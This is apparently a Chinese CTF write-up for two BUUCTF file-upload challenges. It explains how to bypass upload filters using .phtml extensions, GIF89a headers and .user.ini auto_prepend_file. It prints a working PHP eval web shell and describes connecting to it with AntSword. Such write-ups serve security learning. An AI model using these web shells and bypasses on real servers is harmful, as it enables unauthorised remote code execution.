BUUCTF

    科技2025-07-27  24

    文章目录

    一、[极客大挑战 2019]UploadⅠ、.phtmlⅡ、解题 二、[SUCTF 2019]CheckInⅠ、exif_imagetype()绕过Ⅱ、.user.iniⅢ、解题 完

    一、[极客大挑战 2019]Upload

    Ⅰ、.phtml

    .phtml是PHP2程序的标准文件扩展名,当PHP4更新后,统一为.php

    Ⅱ、解题

    开启环境 尝试上传一句话木马,发现网站会检查文件类型 使用Burp抓包,将上传的一句话木马修改后缀,并修改文件类型为image/jpeg

    报错,提示禁止上传内容包含<?的文件,因此不能使用.php

    这里使用旧版本PHP的文件,即.phtml,将一句话木马包进去,另外加上GIF的文件头绕过图片判断

    GIF89a <script language="PHP">@eval($_POST["a"]);</script>

    成功上传

    尝试多次,猜测上传路径为/upload/xxx.phtml,使用蚁剑连接

    根目录找到flag目录,打开即可得到FLAG

    二、[SUCTF 2019]CheckIn

    Ⅰ、exif_imagetype()绕过

    给文件首行添加图片文件头即可绕过,常见的是添加GIF文件头GIF89a

    Ⅱ、.user.ini

    此文件控制着用户设置 若服务器为PHP、且上传的目录内含有php文件可以使用,通过添加语句auto_prepend_file=xxx,指定预解析文件,则可以在加载主页前预解析一句话木马,即可开启后门

    Ⅲ、解题

    上传一句话木马和设置文件,需要添加GIF文件头绕过检测

    其中,一句话木马后缀为jpg

    #a.phtml.jpg GIF89a <script language="PHP">@eval($_POST["a"]);</script> #.user.ini GIF89a auto_prepend_file=a.phtml.jpg

    使用蚁剑连接访问index.php即可得到根目录进而拿到FLAG

    欢迎在评论区留言 感谢浏览

    Processed: 0.011, SQL: 8